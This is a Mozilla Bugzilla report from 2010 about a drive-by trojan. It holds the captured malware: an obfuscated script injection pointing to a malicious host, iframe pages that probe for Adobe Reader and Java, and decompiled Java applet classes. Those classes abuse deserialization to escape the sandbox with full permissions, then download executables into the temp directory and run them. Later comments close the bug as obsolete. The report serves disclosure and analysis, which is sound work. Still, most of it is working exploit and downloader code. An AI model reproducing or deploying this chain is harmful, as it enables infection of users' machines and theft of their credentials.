Closed Bug 541949 Opened 14 years ago Closed 3 years ago

trojan.downloader.js.agent.ewo

Categories

(Firefox :: Security, defect)

3.6 Branch
x86
Windows XP
defect
Not set
critical

Tracking

()

RESOLVED WORKSFORME

People

(Reporter: migabriel.84, Unassigned)

References

(Blocks 1 open bug)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)

We have had problems with a trojan that is wondering freely on the internet since January 8yh and its actions are not yet completely restricted.
Some websites are infected with a JavaScript code that inserts a dynamic iframe wich contains another iframe. The latter loads a Java applet. This one runs an executable file that somehow accesses the FTP passwords saved in FileZilla and perhaps other FTP clients, connects to them and posts the attached javascript code in every index and javascript file. 
Please analize the attached malware code that i have managed to obtain using Firebug addon on a Fedora 12 distribution.

The script that can be found in the web pag.
/*Exception*/ document.write('<script src='+'h)&t&!#t^p!$:))&/^$/()&##k&!!#e&@e!p#$(!v#i()d)#-!c@#)(o)@m@.)m^y(^w)^(e#&#$b#&)!s#^!#e#()#a(r!c(h!@@.)#(c$o$)m@#&#.#&$!e)@$&m#&p&@f$($l)i$^#x^^)-$()c)o)m(!&.&^(^t($r&#$u))e@^$#l$^$^i)($f^(!e)^f^!#a&^m!^&i$^l#&&@y^#@#&.!#r@#u)@^:$(8!))$0$$#8#!0!$)/(#!(n#@$!&o@^(&@v^i@n$k!y&(.$!!!@c!!@z$$&(/##$(!n$@!o(^#!&v@$!i$&(n$@@k@(y^^.(@c^$z(#/(&^((g)@&o^o$!$$g)l!e#(.)c#&$o)&^$@m@^/(z@e#d!&@#g^^e^!^.@^#@n^$e)^t$&^/^)g@o@@^o^$@@g)$l###e#@.$#c^)o$m@)@.)(p$^&e!/$$!($'.replace(/\!|\(|#|@|\^|\$|&|\)/ig, '')+' defer=defer></scr'+'ipt>');

Firs IFrame
<iframe src="http://mediafire-com.ebay.it.etsy-com.yourmaxmedia.ru:8080/index.php?ys" />

<html>
	<head>
		<title>Mxn4rzu36txmtkji6fk9h5roho</title>
	</head>
	<body>
		<script>
		function Zock8gn(){
		try{
	
		 Wub7r6cz = '<^&($i&@)f$#r)$!&a^(m(&(e! &(s^r&&#&c@@=#!p(^i$!&c^($s)!(/!($)C$(&!h)@&a((n!g^(&e!$L$@^o)((g(!$!.#!&p!&$d$#f$$>!)<&$@)/&$#i)f^r!(&!!a&!(m$^e@#^>#'.replace(/\$|\^|#|\!|@|\)|&|\(/ig, '');
		 H9102kw5 = '<^))i^&f!(!r$@#a^)m@!)e(^@ $s!#r^@^@c@@(=^&p$!i#c$(@s#/$j^a$)&v(a@.!h())t@$&m#@l$#)>((<@^/)!!$i)@$f#&r()a&@m&#@e)^&>^$!'.replace(/#|\)|@|\!|\$|&|\(|\^/ig, '');
		 L9z2gkl5f = 'A&(d&)o)&)^b^^e@@(@ !(A&^^c^)r(@$^!o(^(b!&a)$#^(t$'.replace(/@|#|&|\$|\(|\)|\^|\!/ig, '');
		 Igp2ybkx = 'A$$d$o&!)^&b($&e^&& ^P#D@&^F&#!)'.replace(/\)|\^|@|\(|\!|\$|&|#/ig, '');
		 for(i = 0; i < navigator.plugins.length; i++){
		 Htj2r5y = navigator.plugins[i].name;
		 if((Htj2r5y.indexOf(L9z2gkl5f) != -1) || (Htj2r5y.indexOf(Igp2ybkx) != -1)){
		 document.write(Wub7r6cz);
		 }
		 }
		}catch(If9yxc2d){}
	
		try{
		 if (navigator.javaEnabled() ){
		 document.write(H9102kw5);
		 }
		}catch(If9yxc2d){}
	
		}
		25Zock8gn(); 
		</script>
	</body>
</html>

Second IFrame
<iframe src="pics/java.html" />
<html>
	<head>
		<title>Mxn4rzu36txmtkji6fk9h5roho</title>
	</head>
	<body>
		<applet width="300" height="300" archive="http://mediafire-com.ebay.it.etsy-com.yourmaxmedia.ru:8080/pics/JavaGame.jar" code="myf.y.AppletX" />
	</body>
</html>

The jar file

AppletX.java

// Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov  Date: 1/20/2010 5:05:33 PM
// Home Page: http://members.fortunecity.com/neshkov/dj.html  http://www.neshkov.com/dj.html - Check often for new version!
// Decompiler options: packimports(3) 

package myf.y;

import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

// Referenced classes of package myf.y:
//            PayloadX, LoaderX

public class AppletX extends Applet
{

    public AppletX()
    {
    }

    public void init()
    {
        try
        {
            ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(PayloadX.StringToBytes(serializedObject)));
            Object obj = objectinputstream.readObject();
            if(obj != null && LoaderX.instance != null)
            {
                String s = "Xeoi2a";
                String s1 = getParameter("data");
                String s2 = "1";
                if(s1 == null)
                    s1 = "";
                LoaderX.instance.bootstrapPayload(s1, s2);
            }
        }
        catch(Exception exception) { }
    }

    private static final long serialVersionUID = 0xd30f41af207ff1c8L;
    private static final String serializedObject = "ACEDggg57372gg1B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5BgDgC1g2ggg14Agg1g677265676F7269616E4375746F7665727872gg126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8Eg3gggB5AgggC6172654669656C647353657449gggE66697273744461794F665765656B5Aggg9697354696D655365745Aggg76C656E69656E7449gg166D696E696D616C44617973496E46697273745765656B49ggg96E6578745374616D7g49gg1573657269616C56657273696F6E4F6E53747265616D4Aggg474696D655Bggg66669656C647374ggg25B495Bggg5697353657474ggg25B5A4Cggg47A6F6E6574gg144C6A6176612F7574696C2F54696D655A6F6E653B787gg1ggggggg1g1g1ggggggg1ggggggg2ggggggg1ggggg121563AFCgE7572ggg25B494DBA6g2676EAB2A5g2gggg787ggggggg11ggggggg1ggggg7D9ggggggg4gggggg15ggggggg4gggggg12gggggg8Aggggggg2ggggggg3ggggggg1ggggggg4gggggg1ggggggg11gggggg22ggggg2DEFE488Cgggggggggg7572ggg25B5A578F2g3914B85DE2g2gggg787ggggggg11g1g1g1g1g1g1g1g1g1g1g1g1g1g1g1g1g17372gg186A6176612E7574696C2E53696D7g6C6554696D655A6F6E65FA675D6gD15EF5A6g3gg1249gggA647374536176696E677349ggg6656E6444617949gggC656E644461794F665765656B49ggg7656E644D6F646549ggg8656E644D6F6E746849ggg7656E6454696D6549gggB656E6454696D654D6F646549ggg97261774F666673657449gg1573657269616C56657273696F6E4F6E53747265616D49ggg8737461727444617949gggE73746172744461794F665765656B49ggg973746172744D6F646549gggA73746172744D6F6E746849ggg9737461727454696D6549gggD737461727454696D654D6F646549ggg97374617274596561725AgggB7573654461796C696768745BgggB6D6F6E74684C656E67746874ggg25B427872gg126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA1g2ggg14Cggg2494474gg124C6A6176612F6C616E672F537472696E673B787g74gggE416D65726963612F446177736F6Egg36EE8gggggggggggggggggggggggggggggggggggggggggggggggggFE488Cggggggggg2gggggggggggggggggggggggggggggggggggggggggggggggggggggggggg7572ggg25B42ACF317F8g6g854Egg2gggg787ggggggggC1F1C1F1E1F1E1F1F1E1F1E1F77gAggggggg6gggggggggggg7571gg7Eggg6ggggggg2gggggggggggggggg787372gggD6D79662E792E4C6F61646572585E8B4C67DDC4g9D8g2gggg787g78FFFFF4E2F964ACgggA".replace('g', '0');
    public static String data = null;

}

LoaderX.java

// Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov  Date: 1/20/2010 5:06:33 PM
// Home Page: http://members.fortunecity.com/neshkov/dj.html  http://www.neshkov.com/dj.html - Check often for new version!
// Decompiler options: packimports(3) 

package myf.y;

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class LoaderX extends ClassLoader
    implements Serializable
{

    public LoaderX()
    {
    }

    private void writeObject(ObjectOutputStream objectoutputstream)
        throws IOException, ClassNotFoundException
    {
        objectoutputstream.defaultWriteObject();
    }

    private void readObject(ObjectInputStream objectinputstream)
        throws IOException, ClassNotFoundException
    {
        instance = this;
        objectinputstream.defaultReadObject();
    }

    public void bootstrapPayload(String s, String s1)
        throws IOException
    {
        Object obj = null;
        try
        {
            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
            byte abyte0[] = new byte[8192];
            InputStream inputstream = getClass().getResourceAsStream("/myf/y/PayloadX.class");
            int i;
            while((i = inputstream.read(abyte0)) > 0) 
                bytearrayoutputstream.write(abyte0, 0, i);
            abyte0 = bytearrayoutputstream.toByteArray();
            URL url = new URL("file:///");
            Certificate acertificate[] = new Certificate[0];
            Permissions permissions = new Permissions();
            permissions.add(new AllPermission());
            ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(url, acertificate), permissions);
            Class class1 = defineClass("myf.y.PayloadX", abyte0, 0, abyte0.length, protectiondomain);
            if(class1 != null)
            {
                Field field = class1.getField("data");
                Field field1 = class1.getField("cc");
                Object obj1 = class1.newInstance();
                field.set(obj1, s);
                field1.set(obj1, s1);
                obj1 = class1.newInstance();
            }
        }
        catch(Exception exception) { }
    }

    private static final long serialVersionUID = 0x5e8b4c67ddc409d8L;
    public static LoaderX instance = null;

}

PayloadX.java

// Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov  Date: 1/20/2010 5:07:09 PM
// Home Page: http://members.fortunecity.com/neshkov/dj.html  http://www.neshkov.com/dj.html - Check often for new version!
// Decompiler options: packimports(3) 

package myf.y;

import java.io.*;
import java.net.URL;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class PayloadX
    implements PrivilegedExceptionAction
{

    public static byte[] StringToBytes(String s)
    {
        byte abyte0[] = new byte[s.length() / 2];
        for(int i = 0; i < s.length(); i += 2)
            abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));

        return abyte0;
    }

    public Object run()
        throws Exception
    {
        if(data == null)
            return null;
        try
        {
            String s = System.getProperty("os.name");
            if(s.indexOf("Windows") >= 0)
            {
                int i = 1;
                if(cc != null)
                    i = Integer.parseInt(cc);
                for(int j = 0; j < i; j++)
                {
                    URL url = new URL((new StringBuilder()).append(data).append(Integer.toString(j)).toString());
                    url.openConnection();
                    InputStream inputstream = url.openStream();
                    String s1 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append(File.separator).append(Math.random()).append(".exe").toString();
                    FileOutputStream fileoutputstream = new FileOutputStream(s1);
                    int k;
                    int l;
                    for(k = 0; (l = inputstream.read()) != -1; k++)
                        fileoutputstream.write(l);

                    inputstream.close();
                    fileoutputstream.close();
                    if(k >= 1024)
                        Runtime.getRuntime().exec(s1);
                }

            }
        }
        catch(Exception exception) { }
        return null;
    }

    public PayloadX()
    {
        try
        {
            AccessController.doPrivileged(this);
        }
        catch(Exception exception) { }
    }

    public static String data = null;
    public static String cc = null;

}


Reproducible: Always
Summary: tojan.downloader.js.agent.ewo → trojan.downloader.js.agent.ewo
Group: core-security
Version: unspecified → 3.6 Branch
What should we do with this report ?
There is nothing that we can do with it.

Hey Matti,
Are you by any chance able to reproduce this issue or should we close it?

Flags: needinfo?(bugzilla)

I don't think that this report is still useful after all this years.
The LoaderX.java part is also not working anymore since Mozilla stopped supporting the Java plugin.

Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Flags: needinfo?(bugzilla)
Resolution: --- → WORKSFORME
You need to log in before you can comment on or make changes to this bug.